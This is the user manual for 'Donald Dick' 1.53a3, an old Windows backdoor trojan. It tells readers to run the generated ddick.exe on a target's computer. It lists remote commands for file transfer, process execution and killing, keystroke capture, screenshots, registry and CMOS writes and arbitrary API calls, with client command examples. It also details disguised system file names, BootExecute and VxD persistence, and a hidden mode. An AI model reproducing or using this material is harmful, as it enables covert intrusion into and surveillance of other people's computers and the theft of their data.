version 1.53a3: recent changes from 1.53a2:
bugfix: high 2 bytes of spx network number were lost,
now network number is hex by default
Preliminary SmartMorph is used for executables (loaders are still defenceless)
Run ddsetup.exe, it will generate Donald Dick unique installable
file ddick.exe; run ddick.exe (you may rename it) on a computer you
want to f@#k and have fun.
version 1.53a2: recent changes from 1.53a1 version:
now, commands, that expect file names and paths, accept the following
constants (anywhere in the string):
::SYSDIR - windows system directory
::WINDIR - windows directory
::TMPDIR - temporary directory
::PRGDIR - program files directory
note that directories also contain drive
version 1.53a1: recent changes from 1.53a version:
new commands:
REGVAL1
FREAD
FWRITE
Command line parameters:
[...]
where
: 0 - SPX, 1 - TCP
: target taddress; TCP example: 127.0.0.1; SPX example: 22FA6700B
: port (socket); 0 - use default (23476 for TCP, 0x9014 for SPX)
: d=N, where N is delay before execution, ms
D=N, where N is delay after execution (has no meaning if repeat
count is unspecified or 1), ms
r=N, where N is repeat count (result is sent back for the last
executed command only)
p=X, where X is 32 characters of password; it is recommended
that this option will be last in the string
: see below
...: parameters if required
examples:
get info (no password is required):
client.exe 0 220482120A8 0 " " 0 info
client.exe 1 212.20.33.8 " " 0 info
upload file (no password is required):
client.exe 1 212.20.33.8 " " 0 upload "c:\program files\e.exe" e.exe
set binary value in the registry (no password is required):
client.exe 0 220482120A8 0 " " 0 setregbin hklm\system\aaa test F01456
set system colors (no password is required):
client.exe 0 220482120A8 0 " " 0 setcolors "2 3" "255 0 0 128 128 0"
open CDROM tray 10 times (assume that user will close it),
delay before execution 20 sec, after that - 120 s, no password is required
client.exe 0 220482120A8 0 "r=10 d=20000 D=120000" opencd
client will wait for reply of the last command, it is long - you may
ctrl-break it, the request will be executed anyway
Commands:
Server:
ECHO, HIDDEN, INFO, PORT, RAISE, REGISTER, SETPASS,
TERMINATE, TESTFAR, TESTNEAR, UNINSTALL, UPGRADE
Chat:
CHATCLR, CHATRD, CHATRDNV, CHATSIZE, CHATWR, CHATWRNV
File system:
CREATEDIR, DIR, DOWNLOAD, ERASE, GETDRIVES, RCOPY,
REMOVEDIR, RENAME, SETFTEQ, SETFTIME, UPLOAD
Processes:
FORGETALL, GETPCLASS, GETPID, GETPROCLIST, GETSUSPTHR, GETTHRLIST, KILL,
KILLBYNAME, KILLTHR, RESUME, RESUMEALL, RUN, SETPCLASS, SUSPEND
Registry:
REGDELK, REGDELV, REGKEY, REGNEWK, REGSETBIN,
REGSETDWORD, REGSETSZ, REGVAL, REGSETVAL
System:
ANYCALL, GETTIME, LOGOFF, POWEROFF, REBOOT, SETCOMPNAME, SETTIME,
SHUTDOWN, SPI, SYSINFO
Keyboard:
KEYBSAVE, KEYBUF, KEYMAP, KEYSTROKE
Windows:
CHILDWINDOWS, GETCOLORS, GETWINDOW, HWNDDESKTOP, SCREENSHOT,
SETCAPTION, SETCOLORS, WINDOWS, WINMSG, WINSHOT
Hardware:
RDCMOS, WRCMOS
Jokes:
CLOSECD, MONOFF, MONON, MSGBOX, OPENCD, PLAY
All:
ANYCALL
[ [...]]
-- not tested yet --
Call any function - very cool but dangerous.
Param may be immediate data (number or arrays) or may start with 'p';
in this case they are data and/or buffers which param points to.
If param contains only 'p' then pointer is NULL.
API function is called inside thread which processes the request.
Flags:
bit 0,1: 0 - use LoadLibrary( module name ),
GetProcAddress( function name) and perform near call,
1 - use offset (selector must be any value)
and perform near call,
2 - use selector, offset and perform far call.
bit 2: params push order, 0 - right->left (C), 1 - left->right (PASCAL)
if bits 4,5 are not zero then this bit is ignored.
bit 3: who removes params from the stack, 0 - caller, 1 - callee.
bit 4,5: register optimization (first params are passed in
register set):
0 - none,
n/i 1 - Watcom C, the set is EAX, EDX, EBX, ECX or EDX:EAX, ECX:EBX,
n/i 2 - Delphi, the set is EAX, EDX, ECX.
bit 6: how to pass return value buffer's address for arrays:
0 - Watcom C - address is passed in ESI
1 - Delphi, when register optimization is used - address is
passed in the last register in the set if parameters count
less than 3 or in the first position on the stack;
if no optimization is set in bits 4,5 then address
is passed in the first position on the stack
bit 8-31: buffer size to allocate on the stack for the return value;
if zero then return value is expected in EDX:EAX and bit 6
is ignored.
CHATCLR [] Clears chat room; if non-volatile
flag is nonzero then non-volatile
chat room is cleared
CHATRD [] Reads messages from chat room
starting with index or all of them
if index 0 or none;
message format:
index of message is incremented
continiuosly since first message
in chat the room even the room
was cleared
CHATRDNV [] same as CHATRD but operates with
non-volatile room
CHATSIZE [] Get/set chat room size, default
size is 8K; chat room is cleared
CHATWR [...] Add message(s) to the chat room
CHATWRNV [...] same as CHATWR but operates with
non-volatile room; non-volatile
chat room is limited to 2K
CHILDWINDOWS Get child windows of window
CLOSECD
CREATEDIR [...]
Note: returns as many result
strings as parameters passed.
DIR Don't forget file mask!
DOWNLOAD
ECHO Server sends received packet back
ERASE <> [...<>]
force flag: /0 or /1; /1 - erase
file even read only or directory
with all files and subdirectories.
Note: returns as many strings as
parameters passed.
FORGETALL Clears suspended thread table
GETCOLORS Get system colors
GETDRIVES Get list of drives
GETPCLASS Get priority class
GETPID Get server's process id
GETPROCLIST Get list of processes
GETSUSPTHR Get list of suspended threads in
the form:
GETTHRLIST Get list of threads for specified
process
GETTIME Returns date and time
GETWINDOW Returns window handle(s) relative
to the given window (see Win32 API
documentation on GetWindow()
for description)
HIDDEN <0/1> hidden mode on/off
in hidden mode server does not
reply on all commands if error
occured before their processing
(reception, password verification,
function code verification)
Returns current mode
HWNDDESKTOP Returns desktop window handle
INFO Returns some info
KEYBSAVE [<0/1>] not implemented without parameter or if that one
is nonzero, saves current lookup
table; if parameter is zero,
clears saved table
KEYBUF [ []] Returns captured scan codes;
if parameter is
absent then returns last keystrokes;
only the following scan codes are
captured: 02..1C, 1E..29, 2B..35,
37, 39, 47..53 and 9C, B5 - these
codes denote extended keys with
secondary scan codes 1C and 35
KEYMAP [ Remaps keys and return current map;
...] this command sets elements in
lookup table;
lookup table contains 256 scan codes in
range 0..127; first half of table is
used to remap regular keys, second one
is used to remap extended keys (those
keys produce two-byte scan codes, first
code is E0); normally,
elements at indexes 0 and 128 have
code 0, at 1 and 129 - 1 and so on;
key is disabled if code is 0;
note that it is impossible to remap
pause/break key
KEYSTROKE [...] simulates keystrokes
KILL [...]
Note: returns as many result
strings as parameters passed.
KILLBYNAME [...]
Note: returns as many result
strings as parameters passed.
KILLTHR [...]
Kills thread(s) (under Win95 may
not be done immediately)
Note: returns as many result
strings as thread ids passed.
LOGOFF Performs logoff for workstation
MONOFF Turns monitor off
MONON Turns monitor on
MSGBOX
Displays message box, see below
for the description of
OPENCD
PLAY
PORT GET/[...] Get or set port numbers in registry,
server must be restarted to
apply changes; protocol name
may be SPX or TCP; is
a number or D (default port)
always returns port numbers
POWEROFF Performs power off
RCOPY [...]
Note: returns result string for
each parameter pair.
RDCMOS Reads CMOS data, start - index in range 0..255
RAISE Raises an exception - for debug purposes only
REBOOT
REGDELK Deletes subkey from the registry
REGDELV Deletes value from subkey
REGISTER [] Registers server
Returns status in the first line,
registration info in the second line,
registration status in the third line
if registration data is present
REGKEY Displays subkeys in key
REGNEWK Creates new subkey
REGSETBIN Sets binary value, value
is the sequence of hex digits
without any spaces
REGSETDWORD Sets DWORD value
REGSETSZ Sets string value
REGSETVAL
Sets value of any type. Value
is the sequence of hex digits
without any spaces
REGVAL Key must contain "hklm","hkus",
"hkcu","hkcr" first
REMOVEDIR [...]
Note: returns as many result
strings as parameters passed.
RENAME [...]
Note: returns result string for
each parameter pair.
RESUME [...]
Resumes thread(s)
Note: returns as many result
strings as thread ids passed.
RESUMEALL Resumes all suspended threads
RUN [...]
Note: returns as many result
strings as parameters passed.
SCREENSHOT [ [ [...]]]
SETCAPTION
SETCOLORS
SETCOMPNAME
SETFTEQU Sets date/time of file
equal to reference file
SETFTIME
SETPASS [] Sets or removes password
SETPCLASS Set priority class
SETTIME
SHUTDOWN
SPI [] Get/set system parameters info
SUSPEND [...]
Suspends thread(s) (under Win95
may not be done immediately;
suspension means entering
continious loop so thread
consumes cpu power)
Note: returns as many result
strings as thread ids passed.
SYSINFO
TERMINATE Server terminates itself
TESTFAR Returns far address of far test function - debug only
TESTNEAR Returns near address of near test function - debug only
UNINSTALL Completely uninstalls donald dick server
UPLOAD
UPGRADE restarts server anyway
WINDOWS Get window list
WINMSG
params may be numbers or may
start with 'p'; in this case
they are data and/or buffers
which lparam and/or wparam
points to
WINSHOT [ [ [...]]]
screenshot for the specified
window or for the foreground
window if handle is 0
WRCMOS
Files:
oleproc.exe - main executable file
pnpmgr.pci - executable file under Windows95/98
pmss.exe - executable file under WindowsNT
vmldr.vxd - Dick loader and thread manager for Windows95/98
bootexec.exe - Dick loader for WindowsNT
jpegcomp.dll - JPEG compressor (full version only)
Registry values are in:
under Windows95/98: HKLM\System\CurrentControlSet\Services\VxD\VMLDR
under WindowsNT: HKLM\System\CurrentControlSet\Control\\Session Manager
Type Name Description
------- ----------- --------------------
BINARY Rqdata registration data
BINARY PData (where is the protocol designator) the sequence of
null-terminated strings, each string is the port (socket)
number or "D" to use default port (0x9014 for SPX,
23476 for TCP)
STRING Psdata password, always contains 32 characters
Installation:
When distribution file is launched:
1. kills existing Dick server
2. extracts the following files into system directory:
under Windows95/98:
oleproc.exe
pnpmgr.pci
vmldr.vxd
under WindowsNT:
oleproc.exe
pmss.exe
bootexec.exe
3. modifies registry
under Windows95/98:
creates VMLDR subkey in HKLM\System\CurrentControlSet\Services\VxD;
creates necessary values in that subkey to load vmldr.vxd when
the system starts up;
under WindowsNT:
adds string "bootexec.exe" to the BootExecute value in the subkey
HKLM\System\CurrentControlSet\Control\\Session Manager
4. creates PData0 and PData1 parameters with values
'D',0,'0','x','9','0','1','5' and
'D',0','2','3','4','7','7'
5. extracts plugins:
jpegcomp.dll (full version only)
6. spawns oleproc.exe
Loading:
1. Dick loader is launched by windows:
NT:
bootexec.exe, at the blue screen time
loader creates the service to be launched later;
the executable file of the service is oleproc.exe
95/98:
vmldr.vxd, init order is SHELL_INIT_ORDER+10
loader calls Win32 ShellExecute service to spawn oleproc.exe;
this VxD also may be loaded dynamically to perform thread management
functions
2. oleproc.exe (launched by loader, installer or manually) kills
existing Dick server, copies itself to:
under WindowsNT:
pmss.exe
under Windows95/98:
pnpmgr.pci
and launches it;
this is done to keep executable file closed to allow upgrades;
during upgrade oleproc.exe is replaced by the new file and that file
is launched immediately
3. pmss.exe under WindowsNT:
stops oleproc.exe service and removes it (unfortunately, you may see
this service for a short time if you quickly log on and open 'services'
applet in the control panel)
pnpmgr.pci under Windows95/98:
hides itself
at the end of this process pmss.exe or pnpmgr.pci is the Donald Dick server
String list format:
command:
1st string: []
function code and optional numbers may be decimal if first digit is 1..9,
octal if first digit is 0 or hexadecimal if first digit is 0
followed with x.
options: d=N, where N is delay before execution, ms
D=N, where N is delay after execution (has no meaning if repeat
count is unspecified or 1), ms
r=N, where N is repeat count (result is sent back for the last
executed command only)
p=X, where X is 32 characters of password; it is recommended
that this option will be last in the string
2nd string:
...
Nth string:
reply:
1st string: []
2nd string:
...
Nth string:
